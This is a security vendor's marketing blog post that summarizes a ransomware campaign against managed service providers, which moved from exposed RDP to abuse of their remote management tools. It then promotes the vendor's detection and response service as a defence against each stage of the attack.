MSP security is not at the standard that it should be; how many more times must MSPs succumb to advanced hacker tradecraft before they seek out an effective security solution?
Last week, cyber criminals once again targeted managed service providers (MSPs). The attackers, believed to be a ransomware gang, breached the MSPs’ internal networks and leveraged the MSPs’ own legitimate tools and technologies to deploy ransomware on client networks. Unfortunately, this is not the first time such an event has occurred.
As described by news outlets, the attack timeline was as follows:
- Ransomware gang breaches MPSs via exposed remote desktop protocol (RDP) ports
- Once inside, the attackers elevated their privileges
- Next, the hackers disabled running anti-virus (A/V) products
- After disabling A/V products, the gang looked for popular remote management software accounts that MSPs use to legitimately monitor and manage their clients (software such as Webroot SecureAnywhere, Kaseya VSA, and ConnectWise Control)
- They discovered accounts that allowed them to gain access to Webroot’s SecureAnywhere, Kaseya VAS, and ConnectWise Control
- Finally, the hackers used these accounts to control the remote management software to download files from a popular file-hosting site (pastebin.com) and deploy a Powershell script to the MSPs’ client networks. This Powershell script downloaded and installed the Sodinokibi ransomware on client desktops, laptops, and servers.
As this recent example shows, running anti-virus products and using firewalls was ineffective at stopping this attack. Unfortunately, none of the cyber security solutions these MSPs employed helped them adequately detect and respond in real-time to these sophisticated cyberattacks. Why is that?
Cyber Criminals are leveraging known good
Most cyber security technologies and MSPs are still focusing on tactics and techniques of the past and not capable of detecting the tactics and techniques of modern cyber-attacks. Cyber criminals are very familiar with the defensive and detection technologies that most companies employ, including their weaknesses and limitations. In addition, many cyber criminals now rely on compromising accounts and abusing legitimate access mechanisms (like RDP) to initiate their attack – something that most traditional endpoint security tools cannot effectively defend against.
Here at Blackpoint we are genuinely concerned for all our partners and colleagues in the MSP community. The recent occurrence of not one, but two, attacks specifically targeted against MSPs and the fact that MSPs have highly privileged access into their clients’ networks, gives us strong reason to believe that more attacks against MSPs will occur, if it’s not already happening. Unfortunately, many MSPs continue to focus heavily on endpoint security or lack the resources necessary to monitor their environments 24×7.
However; it doesn’t have to be this way.
Does an effective solution for MSP’s exist?
At Blackpoint, we built our Managed Detection and Response service and patented SNAP-Defense platform specifically to address the tactics and techniques we saw in this most recent attack:
- The attackers gained access to the network via RDP; Blackpoint’s Managed Detection and Response platform SNAP-Defense monitors all RDP activity, regardless of the source, using its endpoint agent as well as via network traffic with its add-on NICOS module. Not only does SNAP detect the activity, it also provides information on the user RDP account involved, information about the source and destination, and even insight and visibility into what was occurring during the RDP session
- The attackers elevated privileges; SNAP-Defense monitors privileged accounts, especially privileged lateral spread/movement; in addition, its analyzer rules look for highly-privileged script executions
- The attackers disabled processes and services that should always be running; SNAP-Defense’s analyzer rules alert users when key or critical processes or services are not running. Detecting if something critical was terminated, especially systematically, is trivial in SNAP
- The attackers leveraged remote access management software to execute Microsoft PowerShell; SNAP-Defense can view process tree activity of remote management software like Webroot SecureAnywhere, Kaseya VSA, and ConnectWise Control, including the exact commands executed by these remote access tools
- The attackers used PowerShell with obfuscated command-line arguments (a common tactic) to download a malicious payload from pastebin.com; SNAP-Defense detects invocations of PowerShell and provides full command-line argument information even if the arguments are obfuscated
With SNAP-Defense, Blackpoint’s experienced Managed Detection and Response team would’ve received multiple warnings and indicators that the MSPs were infected well before the final ransomware was deployed. Blackpoint analysts could’ve then taken immediate response on the MSP’s behalf as soon as malicious activity was detected; even if that activity occurred off-hours.
Deploying a simple, effective and affordable solution.
With Blackpoint’s SNAP-Defense technology and true MDR service, MSPs do not need to live in fear of detecting and preventing such attacks. They also don’t need to rush out and buy every technology solution or service in the marketplace. Instead, they can partner with Blackpoint and leverage its decades of cyber security experience and world-class technology. The best part? Blackpoint’s technology and services are easy to implement, require no additional in-house resources, and are extremely cost-effective for the capability and coverage provided.
If you are an MSP, reach out today and learn about what we offer and how we can help. If you’re an MSP client, then you have a responsibility to ask your MSP what they are doing to protect themselves and you from this kind of attack. Lastly, if you’re a company and looking for an MSP for managed IT services, we can recommend a few who are truly serious about the security of themselves and their clients. Visit our website to learn more